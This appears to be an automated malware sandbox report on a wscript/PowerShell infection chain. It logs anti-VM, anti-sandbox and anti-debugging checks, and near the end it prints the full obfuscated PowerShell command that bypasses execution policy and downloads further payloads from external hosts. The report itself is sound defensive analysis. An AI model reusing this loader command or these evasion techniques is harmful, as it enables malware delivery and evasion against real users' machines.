Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: AddInProcess32.exe, 00000008.00000002.3367046963.00000000029BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLT-
Source: AddInProcess32.exe, 00000008.00000002.3367046963.0000000002915000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.3359661563.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 28E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2640000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1488	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1597	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2967	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6126	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 4868	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224	Thread sleep count: 2967 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224	Thread sleep count: 6126 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2732	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: AddInProcess32.exe, 00000008.00000002.3367046963.0000000002915000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: AddInProcess32.exe, 00000008.00000002.3359661563.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: wscript.exe, 00000000.00000003.2123509518.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125290537.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWR
Source: AddInProcess32.exe, 00000008.00000002.3359661563.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
Source: wscript.exe, 00000000.00000003.2122792958.000001E596322000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123509518.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125290537.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123868780.000001E596323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125184773.000001E596323000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AddInProcess32.exe, 00000008.00000002.3377687423.0000000005CB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllEE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 8_2_00E67090 CheckRemoteDebuggerPresent,

8_2_00E67090

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe

Network Connect: 104.21.84.67 443

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDkDgTreLwDgTreyDgTreDIDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredwBzDgTreGYDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDcDgTreODgTreDgTreyDgTreDYDgTreNwDgTre0DgTreDMDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreDoDgTreLwDgTrevDgTreDQDgTreNQDgTreuDgTreDcDgTreNDgTreDgTreuDgTreDEDgTreOQDgTreuDgTreDgDgTreNDgTreDgTrevDgTreHgDgTreYQBtDgTreHDgTreDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB3DgTreHMDgTreZgDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreH

